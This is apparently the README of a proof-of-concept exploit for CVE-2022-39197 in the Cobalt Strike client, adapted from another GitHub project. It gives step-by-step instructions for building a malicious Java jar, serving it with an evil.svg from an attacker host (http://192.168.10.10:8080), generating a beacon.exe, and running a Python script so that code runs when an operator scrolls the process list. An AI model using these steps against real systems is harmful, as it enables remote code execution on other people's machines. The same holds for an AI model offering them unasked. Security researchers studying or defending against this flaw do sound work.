This project was modified from @its-arun project https://github.com/its-arun/CVE-2022-39197
When I tested the script, I found that the frida script could not query the data in the normal order. The method of modifying the frida script to modify the process name.
Thanks to Master @Kai5174 for his contribution to the utilization method.
- Prepare Payload
1、Edit command executed with your payload in EvilJar/src/main/java/Exploit.java, now it can only play the calculator.
2、Build using jar mvn clean compile assembly:single
4、Move EvilJar-1.0-jar-with-dependencies.jar from EvilJar/target/ to serve/ folder
5、Edit serve\evil.svg replace [attacker]
6、Serve using python3 -m http.server 8080
7、Generate beacon.exe with C2 version less than or equal to 4.7
8、You need to execute the py script on a Windows to go online, and perform countermeasures when the client accesses the process list and sees the beacon.exe process.
- Execute Exploit
python3 -m pip install -r requirements.txt
python3 cve-2022-39197_Yyy.py beacon.exe http://192.168.10.10:8080/evil.svg
Payload will be triggered as soon as the user scrolls through Process List
Windows
Mac
https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg — There’s a great in depth analysis of this vulnerability https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html